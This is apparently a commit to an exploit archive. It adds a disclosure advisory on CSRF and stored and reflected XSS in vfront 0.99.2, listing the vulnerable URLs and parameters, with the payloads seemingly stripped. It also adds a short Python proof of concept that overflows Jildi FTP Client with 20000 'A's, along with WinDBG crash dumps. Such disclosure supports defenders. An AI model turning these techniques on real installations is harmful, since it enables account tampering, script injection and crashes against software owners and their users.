diff --git a/files.csv b/files.csv
index ca8b1eae7..703abbb84 100755
--- a/files.csv
+++ b/files.csv
@@ -33375,6 +33375,7 @@ id,file,description,date,author,platform,type,port
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
+37186,platforms/php/webapps/37186.txt,"vfront-0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@@ -33563,3 +33564,4 @@ id,file,description,date,author,platform,type,port
37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
+37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21
diff --git a/platforms/php/webapps/37186.txt b/platforms/php/webapps/37186.txt
new file mode 100755
index 000000000..3ef8b22da
--- /dev/null
+++ b/platforms/php/webapps/37186.txt
@@ -0,0 +1,131 @@
+# Exploit Title: CSRF & Persistent XSS
+# Google Dork: intitle: CSRF & Persistent XSS
+# Date: 2015-06-02
+# Exploit Author: John Page (hyp3rlinx)
+# Website: hyp3rlinx.altervista.org/
+# Vendor Homepage: www.vfront.org
+# Software Link: www.vfront.org
+# Version: 0.99.2
+# Tested on: windows 7
+# Category: webapps
+
+
+Product:
+===================================================================================
+vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
+
+
+
+Advisory Information:
+====================================
+CSRF, Persistent XSS & reflected XSS
+
+
+
+Vulnerability Detail(s):
+=======================
+
+
+CSRF:
+=========
+No CSRF token in place, therefore we can add arbitrary users to the system.
+
+
+Persistent XSS:
+================
+variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
+into the MySQL database which will be run each time variabili.php is accessed from victims browser.
+
+
+Persisted XSS stored in MySQL DB:
+=================================
+DB-----> vfront_vfront
+TABLE-----> variabili
+COLUMN------> valore (will contain our XSS)
+
+
+Exploit code(s):
+===============
+
+
+CSRF code add arbitrary users to system:
+=======================================
+http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/>&tabella=&uid=&data_dal=All&data_al=All
+
+
+
+Persistent XSS:
+================
+http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
+Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
+"/>
+
+
+
+Reflected XSS(s):
+=================
+http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/>
+
+
+
+XSS vulnerable input fields:
+============================
+http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
+altezza_iframe_tabella_gid <------------- ( Persistent XSS )
+passo_avanzamento_veloce_gid
+n_record_tabella_gid
+search_limit_results_gid
+max_tempo_edit_gid
+home_redirect_gid
+formati_attach_gid
+default_group_ext_gid
+cron_days_min_gid
+
+
+
+Disclosure Timeline:
+===================================
+
+
+Vendor Notification: May 31, 2015
+June 2, 2015 : Public Disclosure
+
+
+
+Severity Level:
+===================================
+High
+
+
+
+Description:
+==========================================================
+
+Request Method(s):
+ [+] GET & POST
+
+Vulnerable Product:
+ [+] vfront-0.99.2
+
+Vulnerable Parameter(s):
+ [+] altezza_iframe_tabella_gid
+ passo_avanzamento_veloce_gid
+ n_record_tabella_gid
+ search_limit_results_gid
+ max_tempo_edit_gid
+ home_redirect_gid
+ formati_attach_gid
+ default_group_ext_gid
+ cron_days_min_gid
+ id_campo
+ op
+
+
+
+Affected Area(s): [+] Admin & MySQL DB
+
+===============================================================
+
+
+
+(hyp3rlinx)
\ No newline at end of file
diff --git a/platforms/windows/dos/37187.py b/platforms/windows/dos/37187.py
new file mode 100755
index 000000000..51bdd1c3d
--- /dev/null
+++ b/platforms/windows/dos/37187.py
@@ -0,0 +1,60 @@
+#!/usr/bin/python
+#Exploit Title:Jildi FTP Client Buffer Overflow Poc
+#Version:1.5.2 Build 1138
+#Homepage:http://de.download.cnet.com/Jildi-FTP-Client/3000-2160_4-10562942.html
+#Software Link:http://de.download.cnet.com/Jildi-FTP-Client/3001-2160_4-10562942.html?hasJs=n&hlndr=1&dlm=0
+#Tested on:Win7 32bit EN-Ultimate
+#Date found: 02.06.2015
+#Date published: 02.06.2015
+#Author:metacom
+
+'''
+===========
+Description:
+===========
+JilidFTP is a powerful ftp-client program for Windows, it fast and reliable
+and with lots of useful features. It supports multi-thread file upload or
+download , so you can upload or download several files at the same time.
+The job manager integrates with the Windows scheduler engine ,this provide
+you more freedom and flexibility to upload or download your files.
+It can also traces changes within a local directory and apply these
+changes to remote ftp server .The user-friendly interface lets your
+software distribution, uploading files to a web-server, and providing
+archives for various purposes more easily.
+
+============
+How to Crash:
+============
+Copy the AAAA...string from Jildi_FTP.txt to clipboard, open Jildi Ftp and press Connect
+and paste it in the Option -- Name or Address --and press connect.
+
+===============================================
+Crash Analysis using WinDBG: Option --> Address
+===============================================
+(f6c.4fc): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
+eip=41414141 esp=000311cc ebp=000311ec iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+41414141 ??
+0:000> !exchain
+0012ef40: 41414141
+Invalid exception stack at 41414141
+
+============================================
+Crash Analysis using WinDBG: Option --> Name
+============================================
+(2ec.dac): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
+eip=41414141 esp=000311cc ebp=000311ec iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+41414141 ?? ???
+0:000> !exchain
+0012ef40: 41414141
+Invalid exception stack at 41414141
+'''
+filename="Jildi_FTP.txt"
+junk1="\x41" * 20000
+buffer=junk1
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file